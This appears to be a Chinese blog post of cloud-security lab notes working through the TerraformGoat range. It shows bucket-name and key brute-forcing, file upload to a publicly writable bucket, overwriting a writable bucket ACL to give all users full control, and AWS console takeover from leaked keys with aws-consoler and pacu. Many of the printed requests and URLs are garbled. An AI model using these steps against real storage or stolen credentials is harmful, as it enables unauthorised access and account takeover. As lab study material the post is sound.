云安全 – 常见漏洞学习笔记

面向对象的存储,也被称为云存储,云存储主要分为三部分,分别是 keydata 和 Metadata

假设一个地址为 http//aaa.s3.ap-northeast-2.amazonaws.c/bbb

这里aaa为存储桶的名称,bbb为key
Data 就是存储的数据本体
Metadata 就是元数据,是数据的标签、描述之类的信息

环境搭建

安装docker
yum install docker
启动docker
service docker start
chkconfig docker on

腾讯云拉取

docker pull registry.cn-beijing.aliyuncs.c/huoxian_p/terraformgoat_tencentcloud:0.0.4
docker run -itd --name terraformgoat_tencentcloud_0.0.4 registry.cn-beijing.aliyuncs.c/huoxian_p/terraformgoat_tencentcloud:0.0.4
docker exec -it terraformgoat_tencentcloud_0.0./b/bash

Bucket 爆破

部署环境

cd /TerraformGo/tencentclo/c/bucket_object_travers/
vim terraform.tfvars 
这里填入腾讯云生成的api密钥
云安全 - 常见漏洞学习笔记
#生成
terraform init
terraform apply
#销毁
terraform destroy

当 Bucket 不存在时有两种返回情况,分别是 InvalidBucketName 和 NoSuchBucket

云安全 - 常见漏洞学习笔记

当 ==Bucket== 存在时有两种返回情况,分别是列出 Object 或返回 AccessDenied

云安全 - 常见漏洞学习笔记
云安全 - 常见漏洞学习笔记

爆破出 bucket 名称后,可以继续对 key 进行爆破,在 url 后面加上 key,不正确会返回 NoSuchKey

云安全 - 常见漏洞学习笔记
云安全 - 常见漏洞学习笔记

成功爆破出 key

云安全 - 常见漏洞学习笔记

坑点:这里直接使用靶场的环境会报错,原因是缺少 flag 文件

云安全 - 常见漏洞学习笔记

这里我们只需要在同级目录新建一个 flag.txt 即可成功完成创建

云安全 - 常见漏洞学习笔记

Bucket 任意文件上传

如果对象存储配置不当,比如公共读写,就可能会造成任意文件上传与文件覆盖

cd /TerraformGo/tencentclo/c/unrestricted_file_uplo/
vim terraform.tfvars
云安全 - 常见漏洞学习笔记
PU/hx.png HT/1.1
Host: hxlab-.cos.ap-beijing.myqcloud.com
User-Agent: Mozil/5.0 (Windows NT 10.0) AppleWebK/537.36 (KHTML, like Gecko) Chro/100.0.4896.127 Safa/537.36
Accept: te/html,applicati/xhtml+xml,applicati/xml;q=0.9,ima/avif,ima/webp/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 19

<h1>
  test
</h1>
云安全 - 常见漏洞学习笔记
GET /hx.png HT/1.1
Host: hxlab-.cos.ap-beijing.myqcloud.com
User-Agent: Mozil/5.0 (Windows NT 10.0) AppleWebK/537.36 (KHTML, like Gecko) Chro/100.0.4896.127 Safa/537.36
Accept: te/html,applicati/xhtml+xml,applicati/xml;q=0.9,ima/avif,ima/webp/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 19

<h1>
  test
</h1>
云安全 - 常见漏洞学习笔记

Bucket ACL 可写

cd /TerraformGo/tencentclo/c/bucket_acl_writab/
vim terraform.tfvars

直接访问发现 AccessDenied

云安全 - 常见漏洞学习笔记

尝试读取 Bucket 的 ACL 策略,发现可以读取

http//houxian-xxxxxx.cos.ap-beijing.myqcloud.c/?acl

这里 permission 值为 WRITE_ACP,表示可写入

云安全 - 常见漏洞学习笔记

这里使用 PUT 方法修改 ACL 策略

PUT /?acl HT/1.1
Host: houxian-.cos.ap-beijing.myqcloud.com
User-Agent: Mozil/5.0 (Windows NT 10.0) AppleWebK/537.36 (KHTML, like Gecko) Chro/100.0.4896.127 Safa/537.36
Accept: te/html,applicati/xhtml+xml,applicati/xml;q=0.9,ima/avif,ima/webp/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Length: 769

<AccessControlPolicy>
  <Owner>
    <ID>qcs::cam::u/100021562312:u/10002156231/ID>
    <DisplayName>qcs::cam::u/100021562312:u/10002156231/DisplayName>
 /Owner>
  <AccessControlList>
    <Grant>
      <Grantee xmlns:xsi="htt//www.w3.o/20/XMLSchema-instance" xsi:type="CanonicalUser">
        <ID>qcs::cam::u/100021562312:u/10002156231/ID>
        <DisplayName>qcs::cam::u/100021562312:u/10002156231/DisplayName>
     /Grantee>
      <Permission>FULL_CONTRO/Permission>
   /Grant>
    <Grant>
      <Grantee xmlns:xsi="htt//www.w3.o/20/XMLSchema-instance" xsi:type="Group">
      <URI>htt//cam.qcloud.c/grou/glob/AllUser/URI>
    /Grantee>
  <Permission>FULL_CONTRO/Permission>
   /Grant>
 /AccessControlList>
</AccessControlPolicy>
云安全 - 常见漏洞学习笔记

修改 ACL 完成后便可以成功读取文件

云安全 - 常见漏洞学习笔记

AWS 控制台接管

如果我们拿到了 AWS 相关凭证,可以进行控制台的接管

云安全 - 常见漏洞学习笔记

使用工具进行利用

pip install aws-consoler
aws_consoler -R us-east-1 -a {Your_AccessKeyId} -s {Your_SecretAccessKey} -t {Your_Token}
pip install pacu
pacu
set_keys

云安全 - 常见漏洞学习笔记

输入上面泄露的信息后,会生成一个链接,直接访问便可以接管控制台

云安全 - 常见漏洞学习笔记

实验完成后记得销毁!不然会一直烧钱。。。

参考链接:

http//wiki.teamssix.com

© 版权声明
THE END
喜欢就支持一下吧
点赞8 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容